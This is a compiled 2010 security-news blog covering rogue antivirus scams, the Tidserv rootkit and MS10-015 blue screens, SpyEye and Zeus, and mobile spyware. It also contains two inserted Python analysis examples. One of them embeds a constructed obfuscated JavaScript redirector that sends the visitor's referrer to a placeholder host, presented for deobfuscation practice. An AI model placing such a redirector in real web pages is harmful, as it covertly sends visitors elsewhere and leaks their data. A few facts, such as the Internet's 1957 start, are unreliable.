Users are required to submit a new account agreement before a certain date. If not, their Facebook account will be restricted. The message also contains detailed instructions on how to do it.

We’ve seen this type of menacing message before, for example targeting Hotmail or MSN Messenger accounts. But now that Facebook is so popular and is continuously undergoing changes and updates, this is a good way to trick users.

Perhaps many people think it’s not true but, just in case, let’s try and see what happens…
And what happens is that if you follow the instructions given in the email and run the file “agreement.exe”, you’ll be installing the rogue antivirus SecurityTool in your computer.

This program not only displays annoying infection warning messages like many others, but also restarts the computer, prevents executable files from running, and turns the screen blue so that you cannot work with the computer.

So, don’t trust any message like this, and be sure that if the Facebook team wants to inform users of any changes or updates that require their collaboration, they’ll be published in your Facebook account.

Tuesday, February 16, 2010

Security Advisory, Adobe Reader

It's Fat Tuesday — time for an Adobe Update.

Adobe plans to release a security update for Adobe Reader and Acrobat later today.

Read Security Advisory APSB10-07 for additional details.

Sunday, February 14, 2010

Tiger’s play too rough on Valentine’s Day

While most sane people around the world are enjoying a romantic Valentine’s Day today, we at SophosLabs remain vigilant on the front line of the war against malware.

This year, Valentine’s Day coincides with the Chinese New Year as well as the start of the Winter Olympics in Vancouver, and many malware attacks have centred around SEO poisoning of these and other topical search terms.

The Chinese New Year of the Tiger is proving a popular target, especially as this ties in with any Tiger Woods related searches:

As we are seeing on a daily basis, topical issues that have spawned a large number of searches become the target of Fake AV authors:



Tragic events are also fair game:


As well as keeping antivirus up to date, one way to avoid attacks such as these is to use a browser plugin such as NoScript, which blocks the execution of JavaScript from untrusted sources.

So far I haven’t seen any “Free tickets to Paris for Valentine’s Day” spam but there’s always next year I suppose…

Unusual Valentine’s Gift Unwraps FakeAV

While everyone is searching the web for an unusual gift on Valentine’s Day, cybercriminals take this opportunity to propagate rogue antivirus.

Searching for the keywords “unusual-valentines-day-gifts” gives the following results:


Clicking the highlighted link above leads to a fake message such as “Alert! Your system is exposed to risk of virus attack. It’s highly recommended to check your PC immediately. Press OK to start the scan right now”.

This eventually leads to a fake scanning page that urges you to download and execute a binary file, just like this one:


Executing the downloaded file installs the fake antivirus.

Be extra careful on what you’re clicking and don’t execute files downloaded from untrusted sites.

Saturday, February 13, 2010

Tidserv and MS10-015

In the past, viruses and computer threats were created simply for the sake of it. Sometimes these threats would wipe your hard drive clean—just to let you know you’d been owned. This is not the case anymore; nowadays most of the threats we see are profit-oriented and try to keep a very low profile so that they aren't easily detectable by security software.

Backdoor.Tidserv does a very good job in that sense, especially with the latest version (TDL3), which uses an advanced rootkit technology to hide its presence on a system by infecting one of the low-level kernel drivers and then covering its tracks. While the rootkit is active there is no easy way to detect the infection, and because it goes so deep into the kernel, most users cannot see anything wrong in the system.

Most of the time the driver chosen by Tidserv to be infected is “atapi.sys,” but that may vary depending on the hardware configuration. One of the first things the infected driver does when it is loaded by the operating system is to retrieve critical API addresses so that it can allocate memory to load the actual malicious code:



These APIs are retrieved via hard-coded relative virtual addresses (RVAs) into the kernel module, which are calculated at infection time. Microsoft recently released a kernel patch that addressed an unrelated issue (MS10-015 / KB977165), which updates the kernel modules. They also released a blog post about blue screen issues after applying this patch.

What seems to have happened in Tidserv's case is that after this update, the RVAs for the above mentioned APIs changed—therefore causing the infected drivers out there to call invalid addresses and, in turn, cause blue screens every time Windows boots up:
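To make that failure mode concrete, here is an added Python example; it is not code from the Symantec write-up or from the rootkit. It parses a PE export directory to map API names to their RVAs, then replays what the infected driver does: it keeps the RVAs it resolved from the pre-patch kernel image and uses them against the post-patch one. The two kernel images, their RVA values and the placement of the export names are constructed toys, and the parser treats RVAs as equal to buffer offsets (an already-mapped image); a real on-disk kernel module has sections, so a production parser must translate RVAs through the section table, which this one skips.

```python
"""Why hard-coded RVAs break on a kernel update: a toy PE export-table walk.

Added example (not the write-up's or the rootkit's code). The images below
are constructed in memory; RVAs are taken to equal buffer offsets, which is
what an already-mapped image looks like. Real files need section-table
translation, which is omitted here.
"""
import struct

EXPORT_DIR_HEADER = "<IIHHIIIIIII"   # IMAGE_EXPORT_DIRECTORY, 40 bytes


def build_toy_image(exports):
    """Build a minimal PE32+ image whose only content is an export table.
    `exports` is a list of (name, rva) pairs; ordinals are assigned in order."""
    n = len(exports)
    exp_dir = 0x200                          # where the export directory lives
    addr_funcs = exp_dir + 40                # AddressOfFunctions table
    addr_names = addr_funcs + 4 * n          # AddressOfNames table
    addr_ords = addr_names + 4 * n           # AddressOfNameOrdinals table
    pool_start = addr_ords + 2 * n           # NUL-terminated name strings
    pool, name_rvas = b"", []
    for name, _ in exports:
        name_rvas.append(pool_start + len(pool))
        pool += name.encode("ascii") + b"\0"
    img = bytearray(pool_start + len(pool))
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                  # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    # IMAGE_FILE_HEADER: AMD64, no sections, SizeOfOptionalHeader = 240
    struct.pack_into("<HHIIIHH", img, 0x44, 0x8664, 0, 0, 0, 0, 240, 0x2022)
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x20B)                  # PE32+ magic
    # DataDirectory[0] (exports) sits 112 bytes into a PE32+ optional header
    struct.pack_into("<II", img, opt + 112, exp_dir, len(img) - exp_dir)
    struct.pack_into(EXPORT_DIR_HEADER, img, exp_dir,
                     0, 0, 0, 0, 0, 1, n, n, addr_funcs, addr_names, addr_ords)
    for i, (_, rva) in enumerate(exports):
        struct.pack_into("<I", img, addr_funcs + 4 * i, rva)
        struct.pack_into("<I", img, addr_names + 4 * i, name_rvas[i])
        struct.pack_into("<H", img, addr_ords + 2 * i, i)
    img[pool_start:] = pool
    return bytes(img)


def export_rvas(image):
    """Return {export_name: rva} by walking the PE export directory."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                                  # skip IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    dd_offset = 96 if magic == 0x10B else 112                # PE32 vs PE32+
    exp_rva, _ = struct.unpack_from("<II", image, opt + dd_offset)
    if exp_rva == 0:
        return {}
    n_funcs, n_names, addr_funcs, addr_names, addr_ords = struct.unpack_from(
        "<IIIII", image, exp_rva + 0x14)
    result = {}
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", image, addr_names + 4 * i)[0]
        name = image[name_rva:image.index(b"\0", name_rva)].decode("ascii")
        ordinal = struct.unpack_from("<H", image, addr_ords + 2 * i)[0]
        if ordinal >= n_funcs:
            raise ValueError("ordinal out of range")
        result[name] = struct.unpack_from("<I", image, addr_funcs + 4 * ordinal)[0]
    return result


def check_hardcoded_rvas(pre_patch, post_patch, api_names):
    """Replay the infected driver's mistake: the RVAs it resolved from the
    pre-patch kernel are reused against the post-patch one. Returns
    {api: (baked_rva, current_rva, still_valid)}; any False means the
    driver would jump into the wrong code, which surfaces as a bug check
    (blue screen) at boot."""
    baked, current = export_rvas(pre_patch), export_rvas(post_patch)
    return {api: (baked[api], current[api], baked[api] == current[api])
            for api in api_names}


# Constructed toy layouts: the update shifts the pool allocator exports.
PRE_PATCH = build_toy_image([("ExAllocatePool", 0x1A400), ("ExFreePool", 0x1A5C0),
                             ("KeBugCheckEx", 0x2B100)])
POST_PATCH = build_toy_image([("ExAllocatePool", 0x1A4E0), ("ExFreePool", 0x1A6A0),
                              ("KeBugCheckEx", 0x2B100)])

if __name__ == "__main__":
    for api, (old, new, ok) in check_hardcoded_rvas(
            PRE_PATCH, POST_PATCH, ["ExAllocatePool", "ExFreePool"]).items():
        print(f"{api:15s} baked=0x{old:X} now=0x{new:X} {'ok' if ok else 'STALE'}")
```

The same `export_rvas` walk, run over two real kernel builds (after mapping sections), is how a responder confirms that an update moved the exports a hard-coded caller depends on; clean code resolves names at run time through the export table instead of baking offsets in.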



Even worse, because the infected driver is critical for system boot-up, Windows will not boot in Safe Mode either. However, there is still hope for the users who get stuck in this infinite loop of BSoD, in the sense that they are not required to reinstall everything from scratch, but only the infected driver (from a known, clean source). And, here is an example for the most commonly infected system driver, atapi.sys:

  1. Boot from a clean source (e.g. Windows CD)
  2. Locate the infected partition, which is normally the boot partition
  3. Replace atapi.sys in \%Windir%\system32\drivers with the clean backup copy
  4. Reboot

Here's a list with the most common driver names infected by the rootkit, which can be used in the above process:

  • atapi.sys
  • iastor.sys
  • idechndr.sys
  • ndis.sys
  • nvata.sys
  • vmscsi.sys

We are aware that the blue screens may be caused by other good or bad kernel mode applications that were relying on hard coded addresses, but Tidserv is one of the most prevalent threats that may cause this problem. Symantec detects these infected drivers on disk as Backdoor.Tidserv!inf, but recommends that the files are replaced manually, since attempting to remove the file automatically may render the system unbootable.

In conclusion, it seems that no matter how complex and stealthy a threat may be, it may be given away by something as small as a software update. This should be a lesson for the authors that developed the rootkit—but more importantly for the victims that fell for the back door.

Sun VirtualBox Update [3.1.4.57640]

VirtualBox is a general-purpose full virtualizer for x86 hardware. Targeted at server, desktop and embedded use, it is now the only professional-quality virtualization solution that is also Open Source Software.

Some of the features of VirtualBox are:

Modularity. VirtualBox has an extremely modular design with well-defined internal programming interfaces and a client/server design. This makes it easy to control it from several interfaces at once: for example, you can start a virtual machine in a typical virtual machine GUI and then control that machine from the command line, or possibly remotely. VirtualBox also comes with a full Software Development Kit: even though it is Open Source Software, you don't have to hack the source to write a new interface for VirtualBox.
Virtual machine descriptions in XML. The configuration settings of virtual machines are stored entirely in XML and are independent of the local machines. Virtual machine definitions can therefore easily be ported to other computers.

Download: http://www.virtualbox.org/wiki/Downloads

Google Chrome Dev Channel Update [5.0.322.2]

The Google Chrome dev channel has been updated to 5.0.322.2 for Windows, Mac and Linux platforms.

All
  • [r38242] Don't crash when a theme specifies a nonexistent image. (Issue: 31719)
Mac
  • [r38319] Honor modifiers for clicks on home button – cmd-clicking the home button now opens your home page in a new tab. (Issue: 34900)
  • [r38204] Implemented writing direction context menu in text input fields.
  • [r38504] Add local storage nodes to the cookie manager (Issue: 33068)
Linux
  • [r38320] Use of Freetype's emboldening for fonts that don't provide bold. Fixes the sometimes blurry bold fonts. (Issue: 22360)
  • [r38372] Can now drag and drop bookmarks from Firefox. (Issue: 34141)
  • [r38246] Implement content blocking address bar icons and bubbles (Issue: 33314)
Native Client
  • Chrome for Linux and Mac OS 10.6 can now run Native Client modules directly, no plugin required. To enable this feature, run Chrome with the following command line flags: --internal-nacl --enable-gpu-plugin --no-sandbox.
  • Platform-independent NPAPI extensions for 2D, 3D, and mouse/keyboard events are now available.
  • We'd like to hear from you. Please send feedback to native-client-discuss@googlegroups.com.
Extensions
  • [r38239] Don't crash when extensions use cookie. (Issue: 34649)
  • [r38407] Preserve order of browser actions across extension autoupdate. (Issue: 33401)
  • Implemented overflow and reordering of browser actions (this was actually in the last update, but missed the release notes)
Known Issues
  • Linux: Crash when editing a bookmark in the bookmark manager (Issue: 35438)
  • All: Chrome doesn't show popup blocker bubble (Issue: 35594)
  • Mac/Linux: Can't save cookie settings (Issue: 35307)

More details about additional changes are available in the svn log of all revisions.

You can find out about getting on the Dev channel here: http://dev.chromium.org/getting-involved/dev-channel.

If you find new issues, please let them know by filing a bug at http://code.google.com/p/chromium/issues/entry

Warning over sexy instant message called 'Fembot'

(BBC) Lonely internet users are being warned about Fembot, a piece of malicious software that poses as a flirtatious woman looking to chat on instant messaging services.

Victims are persuaded to give out personal information that could be used for fraud or identity theft, according to security experts.

Fembot was first spotted in 2007 but hasn't been seen much since then.

However, there are signs she may be back on the scene in time for Valentine's Day.

She may also be sporting a new, more sophisticated look, according to Richard Clooke from PC Tools.

"These types of attacks have moved on significantly in this time," he said. "The intelligence has improved such that they can tailor their discussion based on the information they are getting and then change their questions or answers to reflect the responses."

Researchers say Flirtbot-type software typically directs an instant messaging user to click through to a website which may request credit card details or force a virus on to their computer.

"There is a certain part of the population who are willing to engage in these kinds of conversations," added Richard Clooke.

In 2007, a Russian company called CyberLover.ru claimed it had developed software that could successfully pass itself off as a member of the opposite sex.

There's no suggestion that CyberLover was involved in the criminal side of online virtual flirting.

However, it is thought that similar technology is being used by the latest generation of Flirtbots.

P2P research: clue needed

At the ShmooCon hacker conference in Washington, D.C., last week two security researchers showed the very sensitive information that people inadvertently make available over peer-to-peer networks.

In their presentation, “Information disclosure via P2P networks: Why stealing an identity via Gnutella is like clubbing baby seals,” pen testers Larry Pesce and Mick Douglas said they found a lot of music, porn, malcode collections and the following:

  • driver's licenses, passport and tax return forms with Social Security numbers;
  • someone's will;
  • a retirement analysis form with savings account totals and income estimates;
  • an IRS form with taxpayer identification number;
  • a completed TurboTax form with personal information filled in.

The two have started The Cactus Project to help security specialists do similar research to help organizations tighten up the information they share over P2P. They list best-of-breed tools for conducting the research, including Mutella and the Gnutella Protocol on their site http://pauldotcom.com/cactusproject.html.

The Network World story quotes Douglas: “We have to keep trying to educate people, but through this kind of research [security practitioners] can take steps to better protect their own organizations going forward.”

Network World story here.

These guys are clearly having too much fun. Below is a quote from the pauldotcom.com site:

“I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is in that we get to work in one of the coolest fields.”  (http://pauldotcom.com/cactusproject.html)

Real life Mafia Wars: Spy Eye tool kit goes after Zeus botnet

Peter Coogan at Symantec put up a very interesting blog post yesterday about a crimeware kit called SpyEye v1.0.7 (on sale now on Russian sites -- $500) that has a module that will kill a Zeus bot infection on a victim’s computer so the bot created by SpyEye can take it over.

In September, Computer Weekly reported the Swedish telco Telia Sonera shut down the Internet connections of Latvian company Real Host after it was linked to the Zeus botnet. At the time, researchers said they believed Real Host's servers had captured about 3.6 million PCs for the Zeus botnet.

They linked Zeus to a Russian gang named Rock Phish which is believed responsible for a massive amount of the phishing attacks aimed at stealing credit card and banking information.

The Zeus network took the hit and recovered, however, sending out massive malicious spam campaigns to infect more machines. One campaign carried an income tax topic in September and another had H1N1 as a lure in December.

Coogan said the SpyEye kit can also create crimeware with:
  • keyloggers
  • credit card modules
  • daily email backup
  • encrypted config files
  • FTP protocol grabbers
  • POP3 grabbers
  • HTTP basic access authorization grabber

“If the use of SpyEye takes off, it could dent Zeus bot herds and lead to retaliation from the creators of the Zeus crimeware toolkit. This, in turn, could lead to another bot war such as we have seen in the past with Beagle, Netsky, and Mydoom.” he wrote.

He credits Mario Ballano Barcena with the analysis.

Symantec blog post “SpyEye Bot versus Zeus Bot” here.

Social media expands: LinkedIn hits 60M


A new user in the Netherlands became the 60 millionth person to sign up with LinkedIn, the professional social networking site.

Facebook says it has 400 million users of whom half log in every day.

Both are fabulous tools for communications and socializing, but making members’ identities and personal information so easily available carries some big risks. Our good friends at Sophos have pointed out that information can be harvested from LinkedIn for spear phishing. The site can contain enough information to be a virtual company directory.

There are unexpected exposures too. Imagine linking to a recruiter you’re having conversations with and being able to see the other people he or she is linked to – like your subordinates – or your boss! That spills just a bit too much info on all of us.

LinkedIn story here.

Social networking revolution brewing: the anti-“villes”


A lot of Facebook members are becoming fans of “I don’t care about your farm, or your fish, or your park, or your mafia!!”

This is basically a privacy issue I suppose.


Shortly after noon today there were about 4,000 Facebook members joining every 10 minutes!



If the surge continues it might become a Facebook denial-of-service issue!
http://www.facebook.com/pages/I-dont-care-about-your-farm-or-your-fish-or-your-park-or-your-mafia/207382931457

The Wall Street Journal reported on this last night about 10 p.m. At that point they said 2,000 people were joining per minute.

"Backlash Against Social Games Brews On Facebook"

Source code for Blackberry and iPhone spyware published

At the BlackHat DC conference and ShmooCon, Nicolas Seriot, an independent researcher, and Tyler Shields of Veracode have independently presented two very similar papers.

The papers analyse weaknesses in the security and application delivery models for iPhone and Blackberry and provide an interesting read, especially if you are looking to write the next spyware application or a bot for one of the platforms.

For me, the most interesting part of the papers is the one showing that, regardless of implemented security mechanisms such as data caging (giving each application its own private storage), a third-party application is able to access a lot of potentially confidential data, such as contact lists, SMS and email storage, and even the Blackberry’s microphone.

It has been known for some time that the application security model in which the publisher verifies the integrity of the application (as Apple, Symbian or Google do) and then publishes it through an application store is not perfect, especially when thousands of applications are published every month. It is simply not possible to check that all code behaves as the application’s developers claim.

For example, it is very easy to develop a game which sends SMS messages to buy additional game credits but at the same time forwards every received SMS message to a third party, effectively creating a spyware application. As soon as verification is not possible, an element of trust kicks in. It is less likely that established developers will risk their own reputation by including a Trojan in their own product. That is why users should be careful when installing new applications from new and untrusted developers.

Once the rogue application is discovered, a publisher’s certificate can be revoked, but it is too easy to enter the market again under a different name, since the cost of obtaining a key is so low.

So, spyware for the recent generation of mobile phones (I suppose we can call them smartphones) is possible. I am afraid that I fail to grasp the novelty. The first malware for phones based on the Symbian platform (still the most popular in the world, though its support is dwindling) appeared more than 6 years ago, and we have not seen an explosion of malware as we have seen on Windows-based personal computers.

I suspect that the reason lies in the lack of one leading mobile platform like on desktop which means that we will not see a deluge of malware for mobile phones before one of the platforms prevails. Of course, that does not mean we will not see an occasional outbreak or targeted attack here and there. We should always be cautious when installing new applications and aware that any new application is a potential security risk.

Gloomy predictions often serve for increasing awareness of one’s research and there is nothing wrong with that, although publishing of the spyware source code is a bit contentious (a point for an entirely different blog post) since the source can be easily changed by script kiddies to create new malware. We can only hope that these gloomy predictions will not become a gloomy reality and if they do SophosLabs will make sure you are protected, as usual.

Windows 7’s strange Battery Notification isn’t any error but a Feature

Many users have complained about Windows 7’s strange battery notification saying “Consider replacing your battery” on laptops, and there was some noise about it in the blogosphere, but Microsoft has now replied. There were many forum posts and blog articles implying that Windows 7 is falsely reporting this situation or, even worse, causing these batteries to fail.

After upgrading to Windows 7, many users are seeing a pop-up window that suggests they “consider replacing” their battery, as capacity has slipped below the 40 per cent level. But the official MSDN blog has confirmed that Windows 7 isn’t killing laptop batteries or causing them to fail; it’s a new intelligent feature of Windows 7.

The post says- “PC batteries inherently degrade in their ability to hold a charge and provide power (as is the case for all rechargeable batteries). The cause of this is complex and includes irreversible changes in battery chemistry, and increased internal resistance among other things and those in turn are dependent on the design and manufacturing of the battery.” It means that Batteries degrade with time and this degradation translates into less battery life for the user over the life of the battery in the PC.

Windows 7 makes use of a feature of modern laptop batteries, which have circuitry and firmware that can report to Windows the overall health of the battery. This is reported in absolute terms as Watt-hours (W-hr) of power capacity. Windows 7 then does a simple calculation to determine a percentage of degradation from the original design capacity. In Windows 7 we set a threshold of 60% degradation (that is, the battery is performing at 40% of its designed capacity), and on reading this Windows 7 reports the status to you. At this point, for example, a battery that originally delivered 5 hours of charge now delivers, on average, approximately 2 hours of charge. The Windows 7 notification is a battery meter icon and notification with the message “Consider replacing your battery”.

Still, Microsoft said it would continue to look into the issue, and asked anyone receiving the warning to let it know on its forums.

Shorten your own URLs

“YOURLS is a small set of PHP scripts that will allow you to run your own URL shortening service (a la TinyURL). You can make it private or public, you can pick custom keyword URL. It comes with its own API.”
http://yourls.org/

It’s installed on your web server (needs PHP 4.3 or better and MySQL 4.1, with mod_rewrite enabled).

“Benefits:

1. Not reliant on third party service
2. Sends link juice to your domain, not a service provider
3. Customize your short links
4. Build your brand (showing your URL)”


Story here.

Cool.

Top 4 most annoying Facebook couples

(CNN)(The Frisky) -- For anyone who is remotely active on Facebook, you no doubt have been faced at some point with inane updates on one of your friend's kid's colds or how wedding-planning was coming along for one of your engaged buddies.

That's why, when parenting Web site Babble published "Facebook's Most Annoying Parents," I immediately thought, "But what about all the annoying couples?" So, without further ado, I present to you the top four most annoying couples on Facebook.


The too-much-in-love couple

Between the constant "I love my honey sooooo much!!" and "I have the most amazing husband in the whole world!!!" updates, these couples do proclaim too much.
Their updates are filled with flowery adjectives and almost always include the words "amazing," "luckiest," and "best! ever!" Sometimes the updates are even addressed to each other, like, "Kelly, it was exactly two months ago today I met you and became the luckiest man in the universe!" or "Mark, I loved every amazing second of our beautiful weekend together!!"

Don't these people have personal email addresses? Can't they actually speak to one another in person and leave the rest of us out of it? But, of course, all these proclamations aren't for their benefit, they're for ours.
We're supposed to feel jealous of their burning love for one another and their incredible luck to have found each other. Unfriend!


The pathetic couple

Outside of their relationship, this couple is miserable and empty. If either of them so much as works outside the home and they're forced to spend eight hours apart, their updates are peppered with hourly countdowns until their end-of-the-day reunion.


If one gets invited to a function without the other, they use their Facebook update to announce how unfair the world is and how nothing else in life is as important as the time they spend with each other.
"I have to go to my BFF's bachelorette party tonight, which means a whole evening without Nick! No fair!!!" How these couples ever managed to survive in the world without each other is one of the great mysteries of life.


The boring couple

It's clear that the Boring Couple, who does nothing but constantly hang out at home, has forgotten that other people actually have fun for fun. They update with: "Excited to stay in for 'movie and pizza night' with the hubby!" or "Gonna cook a big dinner for wifey tonight!!"

Well, hey, guess what, the rest of us are going to eat dinner at some point, too, and unless it's enjoyed with a mentor we've just been granted a meal with from the Make-A-Wish foundation, it probably doesn't warrant two exclamation points...or, you know, a status update on Facebook. These people would be more sad than annoying if they weren't so smug about their domestic bliss.



The passive-aggressive couple


Perhaps the biggest offender of them all, this couple hashes out their issues with one another in passive-aggressive, embarrassing, and often melodramatic updates, like "Would have gotten a lot more sleep if somebody didn't keep me up all night with his constant farting!" or "There's nothing I hate more than a man who can't make up his mind which woman he wants!"

Every other day your feed is cluttered with messages that they've broken up or gotten back together. At least you can take comfort in knowing that they totally deserve each other.

Escort service infected with Troj/JSRedir-AR

Clients of escorts and call girls are usually aware of the risks presented by STIs. However, SophosLabs has been monitoring a different type of infection risk for clients of escorts in Indian cities.


The Troj/JSRedir-AR infection has morphed slightly:


If you look at the variable ‘o[e]’ (two-thirds of the way down) you will see the beginnings of an obfuscated string ‘http://’. Previous versions of Troj/JSRedir-AK and Troj/JSRedir-AR have used non-alphanumeric characters to disguise the strings.
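An analyst's first step with a redirector like this is to recover the strings without running the script. Below is an added Python example (not SophosLabs' code) that statically decodes `String.fromCharCode(...)` calls and `\xNN` / `\uNNNN` escapes, then reports URLs and redirect sinks that only become visible after decoding. `SAMPLE_JS` is constructed for this illustration in the style described above; it is not the actual Troj/JSRedir-AR code, and `example.invalid` is a placeholder host.

```python
"""Static unmasking of obfuscated JavaScript string literals.

Added example (not SophosLabs' code, and SAMPLE_JS is constructed for this
post, not the real Troj/JSRedir-AR). Decodes String.fromCharCode(...) calls
and \\xNN / \\uNNNN escapes without executing anything, then reports URLs
and redirect sinks that only appear after decoding.
"""
import re

FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)")
HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")
UNI_ESC = re.compile(r"\\u([0-9A-Fa-f]{4})")
# A quoted literal, allowing backslash escapes inside it.
STRING_LIT = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""", re.S)
URL = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/?=&%]*)?")
SINKS = ("location", "document.write", "eval(", "unescape(", "setTimeout(", "iframe")


def _chars_to_literal(m):
    codes = [int(c) for c in m.group(1).split(",") if c.strip()]
    text = "".join(chr(c) for c in codes).replace("\\", "\\\\").replace('"', '\\"')
    return '"' + text + '"'


def decode_js_strings(js):
    """Rewrite the script with fromCharCode() calls and hex/unicode escapes
    replaced by plain literals. Purely textual: no JS is executed. (An escape
    that decodes to a quote is left as-is here, a known limitation.)"""
    js = FROMCHARCODE.sub(_chars_to_literal, js)
    js = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)
    js = UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)
    return js


def analyze(js):
    """Return what the obfuscation was hiding. 'hidden_urls' are URLs that
    exist in the decoded literals (joined in source order, a heuristic for
    piecewise concatenation) but not in the raw script."""
    decoded = decode_js_strings(js)
    literals = [m.group(2) for m in STRING_LIT.finditer(decoded)]
    joined = "".join(literals)
    return {
        "literals": literals,
        "hidden_urls": sorted({u for u in URL.findall(joined) if u not in js}),
        "sinks": [s for s in SINKS if s in decoded],
    }


# Constructed sample in the style of a redirector: 'http://' is assembled
# from char codes and the host from hex escapes. The host is a placeholder.
SAMPLE_JS = r"""
var o = []; var e = 3;
o[e] = String.fromCharCode(104, 116, 116, 112, 58, 47, 47);
var h = "\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64";
document.location = o[e] + h + "/in.php?" + "r=" + escape(document.referrer);
"""

if __name__ == "__main__":
    print(analyze(SAMPLE_JS))
```

The output is a triage signal, not proof: a script whose decoded literals form a URL that the raw text never contained, combined with a `location` assignment, is exactly the shape of a redirector and deserves a closer look in a sandbox.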

Facebook Chat is now accessible on popular instant messaging clients

Making good on a promise delivered just about one year ago, Facebook announced that its popular chat feature can now be accessed through any Jabber (XMPP)-compatible desktop instant messaging software, including AIM, iChat, Pidgin, Adium, Miranda, Trillian and...

Users can simply connect their Facebook account with their instant messaging client of choice and they can then chat with Facebook friends without having to stay logged into the social networking site.

Further, Facebook Chat has been integrated into the Facebook Connect platform for developers so other services wishing to integrate instant messaging into their sites.

Last June, Facebook's chat service reached the milestone of 1 billion messages being exchanged in a single day, and its growth has continued.

WinXP users: hold off on installing MS10-015 [BSOD]



Security blogger Brian Krebs is reporting that some Windows XP users are seeing a blue screen of death on reboot after installing Microsoft’s Tuesday patch KB977165 (MS10-015: “Vulnerabilities in Windows kernel could allow elevation of privilege.”)

“Turns out, a non-trivial number of XP users are reporting that their systems suffer from the dreaded Blue Screen of Death (BSoD) and fall into an interminable reboot loop after installing the latest batch of patches from Redmond,” he wrote.

Brian Krebs’ blog here.

Those trying to maintain Microsoft systems are caught in the cross-currents of the patching process: some patches might be buggy (think “delay”) but the dark side will be reverse engineering the patches as fast as they can (do it now.)

It almost seems like it would be a good idea for the users of Microsoft products to hold off about two days before installing the Patch Tuesday updates. That seems to be how long it takes for the word to get out – like this problem – that there are glitches in the updates.

The overwhelming number of Microsoft fixes are straightforward and urgently needed security measures. However, the massive complexity presented by the older flavors of the Windows operating system and service pack levels almost guarantees that there are going to be problems like this.

Possibly a good strategy would be phased updates especially for enterprise systems:

-- Immediately install just the patches that fix vulnerabilities with in-the-wild exploits if you are running the vulnerable applications, modules, plug-ins, etc.

-- Wait three days for all others

-- Wait a week for non-critical (no reported exploits) updates to less-used flavors of Windows and less-used applications.

Meanwhile, have someone keep an eye on the security news sources to spot problems like this one.

Krebs’ blog carries some good, detailed advice for those whose machines have been disabled already by the glitch.

Computer World carried a story about the problem and noted:

“This was not the first time that a Microsoft update has incapacitated Windows PCs. Two years ago, a set of updates for Vista sent an unknown number of machines into an endless series of reboots. Similar problems stymied users who tried to upgrade to Windows XP Service Pack 3 (SP3) in May 2008, and others attempting to upgrade from Vista to Windows 7 last October.”

Today Softpedia carried a statement from Jerry Bryant, Microsoft's senior security communications manager lead:
“We are aware that after installing the February security updates a limited number of users are experiencing issues restarting their computers. Our initial analysis suggests that the issue occurs after installing MS10-015 (KB977165). However, we have not confirmed that the issue is specific to MS10-015 or if it is an interoperability problem with another component or third-party software. Our teams are working to resolve this as quickly as possible. We also stopped offering this update through Windows Update as soon as we discovered the restart issues. However, those using enterprise deployment systems such as SMS or WSUS will still see and be able to deploy these packages.” 

New Rogue: SecurePcAv

SecurePcAv is a phony antivirus program that has been infecting PC's across the interwebs in recent days.



If your PC is infected with SecurePcAv you will most likely experience the following:
  • Fake system scans that report numerous infections and refuse to remove the supposed infections until you buy the phony software.
  • Alerts and warnings stating the PC is under attack or unprotected and recommending you buy the phony software.
  • Other software will not work: when attempting to open programs, a warning stating the program is infected appears and the software is closed.
  • Web browser hijacking, redirecting the user to malicious websites or showing false security warnings on sites like Google.com.

Zeus - Exploiting Spear Phishing to Spear Phish

The Zeus crimeware family has moved into new territory with its latest spam campaign - purporting to be a warning about targeted phishing attacks on “.gov” and “.mil” domains, by Zeus Trojans no less!
In fact, one of the latest spam samples we’ve seen duplicates the title and first three paragraphs of a blog entry by well-known security expert Brian Krebs, which discusses a previous iteration of this Zeus attack. As seen below, the spam sample starts off with the same three lines of the blog post, before starting into the phony KB content and links that lead to Zeus malware.



Note that while reports on the initial campaign suggest only “.gov” and “.mil” addresses were targeted, we have seen these later samples from a wider variety of sources.

New Rogue: Paladin Antivirus

Paladin Antivirus is a phony security program, designed to rip people off. Paladin Antivirus tricks people into thinking they are downloading legitimate antivirus software, then continually displays false security alerts and warnings followed up with requests for users to buy or register the software.



Once a computer becomes infected with Paladin Antivirus it will instantly begin a system scan and will report multiple infections. Paladin Antivirus will refuse to remove any of these supposed infections until the user buys or "registers" the software. Do not fall for this scam.



Paladin Antivirus will also use pop-up system warnings and alerts stating the PC has numerous infections or is under attack, and suggests purchase of the software to ensure protection.



Unfortunately if you fall for the Paladin Antivirus scam, you will quickly learn you have been ripped off. Paladin Antivirus will not prevent infections nor will it remove existing infections. Paladin Antivirus is an infection in itself.


If your computer is infected with this malware, you should remove it soon, see Virus Removing to learn how to remove it.

History of the Internet

Have you ever wondered how the Internet started 50 years ago, in 1957? Below is a nice video which depicts how the Internet has changed over time in the modern age. Do check it out!



Hope you liked watching this video!

New Google Chrome Beta for Mac gets Extensions

Google launched the Mac version of its Chrome browser in Dec 2009. A new beta build is now available which offers new features like extensions, bookmark sync, and more.

Now you’ll be able to install any of the over 2,200 extensions currently available in Chrome’s extensions gallery. Extensions can add useful, informative, fun, or quirky functionality to your Chrome browser. The new build also adds bookmark and cookie managers in a way that feels completely at home on the Mac.

Download: You can download Google Chrome Beta for Mac or update your current chrome build.

The Buzz is getting LOUDER

It has been barely two days since Google announced their new social integration and messaging tool called Google Buzz. Today we saw the first example of malware, W32/Zuggie-A, pretending to be Google Buzz.
Analysis of W32/Zuggie-A gives the impression of a hastily assembled worm, really a modification of the W32/SillyFDC family of worms but with a twist.
When W32/Zuggie-A is installed, it creates the following files:

